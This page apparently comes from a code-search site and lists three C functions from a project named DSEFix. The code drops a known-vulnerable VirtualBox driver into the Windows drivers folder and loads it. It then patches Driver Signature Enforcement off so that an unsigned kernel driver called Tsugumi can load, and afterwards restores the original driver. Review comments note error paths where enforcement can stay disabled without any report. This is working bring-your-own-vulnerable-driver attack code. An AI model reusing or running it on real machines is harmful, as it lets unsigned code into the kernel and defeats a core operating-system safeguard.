示例#1
文件: main.c 项目: AlphaPo325/DSEFix
/*
* UnloadVulnerableDriver
*
* Purpose:
*
* Undo the driver load: unload the VBoxDrvSvc driver when VirtualBox was not
* installed, otherwise stop the service and restore the saved driver backup.
*
*/
void UnloadVulnerableDriver(
	VOID
	)
{
	SC_HANDLE	hScm;

	//
	// VBox was not present before: nothing to restore, just unload the driver.
	//
	if (g_VBoxInstalled != TRUE) {
		scmUnloadDeviceDriver(VBoxDrvSvc);
		return;
	}

	//
	// VBox was present: stop our VBoxDrv service first. A failed SCM open
	// skips the stop; the restore below is attempted either way.
	// NOTE(review): SC_MANAGER_ALL_ACCESS is requested; the rights that
	// scmStopDriver actually needs are not visible here - confirm whether a
	// narrower access mask is enough.
	//
	hScm = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
	if (hScm != NULL) {
		scmStopDriver(hScm, VBoxDrvSvc);
		CloseServiceHandle(hScm);
	}

	//
	// Put the saved driver backup back in place.
	//
	supBackupVBoxDrv(TRUE);
}
示例#2
文件: main.c 项目: AlphaPo325/DSEFix
/*
* LoadVulnerableDriver
*
* Purpose:
*
* Write the VBoxDrv image to <system directory>\drivers\VBoxDrv.sys, pass that
* path to scmLoadDeviceDriver together with VBoxDrvSvc and return the device
* handle it produces. Returns NULL on any failure.
*
* Side effects visible in this routine: g_VBoxInstalled is set from
* supBackupVBoxDrv(FALSE), any existing file at the target path is overwritten
* (CREATE_ALWAYS), and the dropped file is deleted again after a successful load.
*
*/
HANDLE LoadVulnerableDriver(
	VOID
	)
{
	HANDLE	hFile;
	HANDLE	hDevice;
	DWORD	bytesIO;
	WCHAR	szDriverBuffer[BUFFER_SIZE];

	//
	// Combine full path name for our driver.
	//
	// NOTE(review): RtlSecureZeroMemory takes a byte count, but BUFFER_SIZE is
	// the element count of a WCHAR array, so only part of the buffer is cleared;
	// sizeof(szDriverBuffer) would cover all of it.
	// NOTE(review): GetSystemDirectory is capped at MAX_PATH characters and the
	// suffix is appended afterwards; this stays in bounds only if BUFFER_SIZE
	// leaves room for both. BUFFER_SIZE is defined outside this listing - confirm.
	//
	RtlSecureZeroMemory(szDriverBuffer, BUFFER_SIZE);
	if (!GetSystemDirectory(szDriverBuffer, MAX_PATH)) {
		return NULL;
	}
	_strcat(szDriverBuffer, TEXT("\\drivers\\VBoxDrv.sys"));

	//
	// Backup vboxdrv if exists.
	// The result is kept in g_VBoxInstalled for the unload path.
	//
	g_VBoxInstalled = supBackupVBoxDrv(FALSE);

	//
	// Drop our driver file to the disk.
	//
	// CREATE_ALWAYS replaces whatever file is already at this path; share mode 0
	// keeps other openers out while the handle is held.
	// NOTE(review): every early return from here on leaves without calling
	// supBackupVBoxDrv(TRUE) or removing the dropped file, so a failed run can
	// leave the original driver replaced on disk unless the caller cleans up
	// (caller not visible here - confirm).
	//
	hFile = CreateFile(szDriverBuffer, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
	if (hFile == INVALID_HANDLE_VALUE) {
		return NULL;
	}
	bytesIO = 0;
	// WriteFile's return value is not checked; the byte count test below is the
	// only success check for the write.
	WriteFile(hFile, VBoxDrv, sizeof(VBoxDrv), &bytesIO, NULL);
	CloseHandle(hFile);

	//
	// Check if file dropped OK.
	//
	if (bytesIO != sizeof(VBoxDrv)) {
		return NULL;
	}

	//
	// Open device handle.
	//
	hDevice = NULL;
	if (!scmLoadDeviceDriver(VBoxDrvSvc, szDriverBuffer, &hDevice)) {
		return NULL;
	}

	//
	// Driver file is no longer needed.
	// The DeleteFile result is ignored, so a failed delete goes unreported.
	//
	DeleteFile(szDriverBuffer);
	return hDevice;
}
示例#3
/*
* ldrMain
*
* Purpose:
*
* Program entry point.
*
* Checks the OS version, the instance counter and that VirtualBox.exe is not
* running, then reads the first command line parameter: "-l" selects
* TSMI_INSTALL, "-u" selects TSMI_REMOVE, anything else shows the help text.
*
* Install path: back up the installed VBoxDrv, stop VBox networking, the USB
* monitor and VBoxDrvSvc, load the bundled VBoxDrv, patch DSE off, set up the
* monitor, patch DSE back on, then restore the backup and restart the drivers.
* Remove path: unload the TsmiDrvName driver and purge the system cache.
*
* The process always ends through ExitProcess(0), whatever the outcome.
*
*/
void ldrMain(
	VOID
	)
{
	BOOL	cond = FALSE;
	LONG	x;
	ULONG	l = 0, dwCmd;
	HANDLE	hDevice;
	PVOID	DataBuffer;
	BOOL	bConDisabled, bUsbMonDisabled;
	WCHAR	cmdLineParam[MAX_PATH + 1];
	WCHAR	szDriverBuffer[MAX_PATH * 2];

	__security_init_cookie();

	bConDisabled = FALSE;
	bUsbMonDisabled = FALSE;
	DataBuffer = NULL;
	hDevice = NULL;

	dwCmd = 0;
	// cond stays FALSE, so this body runs once; the loop exists only so that
	// `break` can jump to the common cleanup after it.
	do {

		//
		// Check OS version.
		//
		RtlSecureZeroMemory(&g_osv, sizeof(g_osv));
		g_osv.dwOSVersionInfoSize = sizeof(g_osv);
		RtlGetVersion((PRTL_OSVERSIONINFOW)&g_osv);

		//
		// We support only Vista based OS.
		//
		if (g_osv.dwMajorVersion < 6) {
			MessageBox(GetDesktopWindow(), TEXT("Unsupported OS."),
				T_PROGRAMTITLE, MB_ICONINFORMATION);
			break;
		}

		//
		// Check number of instances running.
		// NOTE(review): this only sees other processes if g_lApplicationInstances
		// is shared between them; its declaration is outside this listing - confirm.
		//
		x = InterlockedIncrement((PLONG)&g_lApplicationInstances);
		if (x > 1) {
			break;
		}

		//
		// Check if any VBox instances are running, they must be closed before our usage.
		//
		if (supProcessExist(L"VirtualBox.exe")) {
			MessageBox(GetDesktopWindow(), TEXT("VirtualBox is running, close it before."),
				T_PROGRAMTITLE, MB_ICONINFORMATION);
			break;
		}

		//
		// Query command line.
		//
		RtlSecureZeroMemory(cmdLineParam, sizeof(cmdLineParam));
		GetCommandLineParam(GetCommandLine(), 1, cmdLineParam, MAX_PATH, &l);
		if (l == 0) {
			//
			// Nothing in command line, simple display help and leave.
			//
			MessageBox(GetDesktopWindow(), T_HELP, T_PROGRAMTITLE, MB_ICONINFORMATION);
			break;
		}

		//
		// Check known command.
		// The comparison is case-insensitive; dwCmd stays 0 for anything else.
		//
		if (_strcmpi(cmdLineParam, TEXT("-l")) == 0) {
			dwCmd = TSMI_INSTALL;
		}
		else {
			if (_strcmpi(cmdLineParam, TEXT("-u")) == 0) {
				dwCmd = TSMI_REMOVE;
			}
		}
		if (dwCmd == 0) {
			MessageBox(GetDesktopWindow(), T_HELP, T_PROGRAMTITLE, MB_ICONINFORMATION);
			break;
		}

		//
		// Init ldr and DSEFix.
		//
		if (!ldrInit(dwCmd)) {
			break;
		}

		//
		// Process command.
		//
		switch (dwCmd) {
			
			case TSMI_INSTALL:

				// Backup vboxdrv if exists.
				// The result is discarded here, so the code below does not know
				// whether a VBoxDrv was actually installed.
				supBackupVBoxDrv(FALSE);

				// Stop VBox Networking and USB driver.
				// The two flags record what was switched off so that the cleanup
				// after the loop can switch it back on.
				bConDisabled = (SUCCEEDED(supNetworkConnectionEnable(VBoxNetConnect, FALSE)));
				bUsbMonDisabled = dsfStopDriver(VBoxUsbMon);
				dsfStopDriver(VBoxDrvSvc);

				// Load vulnerable VBoxDrv, disable VBox Network if exist.
				RtlSecureZeroMemory(szDriverBuffer, sizeof(szDriverBuffer));
				if (GetSystemDirectory(szDriverBuffer, MAX_PATH) == 0) {
					MessageBox(GetDesktopWindow(), TEXT("Cannot find System32 directory."),
						NULL, MB_ICONINFORMATION);
					// This break leaves the switch only.
					// NOTE(review): the backup taken above is not restored and
					// VBoxDrvSvc is not restarted on this path; the cleanup after
					// the loop re-enables only the network and the USB monitor.
					break;
				}
				_strcat(szDriverBuffer, TEXT("\\drivers\\VBoxDrv.sys"));
				hDevice = dsfLoadVulnerableDriver(szDriverBuffer);
				if (hDevice) {

					//
					// Disable DSE so we can load monitor.
					// Device handle closed by DSEFix routine.
					//
					if (ldrPatchDSE(hDevice, TRUE)) {

						// Stop our VBoxDrv, need reloading for 2nd usage.
						dsfStopDriver(VBoxDrvSvc);

						// Load custom patch table, if present.
						// The second command line parameter is handed to
						// ldrFetchCustomPatchData; l carries the parameter length
						// in and the data size out.
						// NOTE(review): no validation of the fetched data is visible
						// here; whether ldrFetchCustomPatchData checks it - confirm.
						RtlSecureZeroMemory(cmdLineParam, sizeof(cmdLineParam));
						GetCommandLineParam(GetCommandLine(), 2, cmdLineParam, MAX_PATH, &l);
						if (l > 0) {
							l = 0;
							DataBuffer = ldrFetchCustomPatchData(cmdLineParam, &l);
							if ((DataBuffer != NULL) && (l > 0)) {
								g_TsmiPatchDataValue = DataBuffer;
								g_TsmiPatchDataValueSize = l;
							}
						}

						// Install and run monitor.
						if (!ldrSetMonitor()) {
							MessageBox(GetDesktopWindow(),
								TEXT("Error loading Tsugumi"), NULL, MB_ICONERROR);
						}

						// Enable DSE back.
						// NOTE(review): if dsfStartDriver fails the patch call is
						// skipped, and the result of ldrPatchDSE(hDevice, FALSE) is
						// not checked; in both cases signature enforcement stays
						// disabled and nothing is reported to the user.
						hDevice = NULL;
						if (dsfStartDriver(VBoxDrvSvc, &hDevice)) {
							ldrPatchDSE(hDevice, FALSE);
						}

					}
					else { //ldrPatchDSE failure case

						// Unknown error during DSE disabling attempt.
						MessageBox(GetDesktopWindow(),
							TEXT("Error disabling DSE"), NULL, MB_ICONERROR);
					}

					// Finally, remove our vboxdrv file and restore backup.
					// Runs on both the success and the ldrPatchDSE failure branch;
					// none of the three results is checked.
					dsfStopDriver(VBoxDrvSvc);
					DeleteFile(szDriverBuffer);
					supBackupVBoxDrv(TRUE);

					// Restart installed VBoxDrv.
					// Attempted unconditionally, since the backup result was not kept.
					dsfStartDriver(VBoxDrvSvc, NULL);

				}
				else { //dsfLoadVulnerableDriver failure case.

					// Load error, show error message and restore backup.
					// NOTE(review): unlike the branch above, VBoxDrvSvc is not
					// restarted here after the restore.
					supBackupVBoxDrv(TRUE);
					MessageBox(GetDesktopWindow(),
						TEXT("Error loading VBoxDrv"), NULL, MB_ICONERROR);
				}	
				break;
				
			//
			// Remove command, unload our driver and purge file/memory list cache.
			//
			case TSMI_REMOVE:
				scmUnloadDeviceDriver(TsmiDrvName);
				supPurgeSystemCache();
				break;

		}

	} while (cond);

	//
	// Cleanup after install.
	// Also reached by every early `break` above; dwCmd is still 0 for the breaks
	// taken before the command was parsed, so they skip this block.
	//
	if (dwCmd == TSMI_INSTALL) {

		// Re-enable VBox Network, UsbMonitor if they're disabled.
		if (bConDisabled) {
			supNetworkConnectionEnable(VBoxNetConnect, TRUE);
		}
		if (bUsbMonDisabled) {
			dsfStartDriver(VBoxUsbMon, NULL);
		}

		// Free memory allocated for custom patch table.
		// presumably allocated from the process heap by ldrFetchCustomPatchData -
		// TODO confirm. g_TsmiPatchDataValue is left pointing at the freed block;
		// the process exits right below.
		if (DataBuffer != NULL) {
			HeapFree(GetProcessHeap(), 0, DataBuffer);
		}
	}

	// The counter is decremented even when this instance bailed out at the
	// instance check, which balances the increment made there.
	InterlockedDecrement((PLONG)&g_lApplicationInstances);
	// Exit code is always 0, including on the error paths; ExitProcess does not
	// return, so the `return` after it is never reached.
	ExitProcess(0);
	return;
}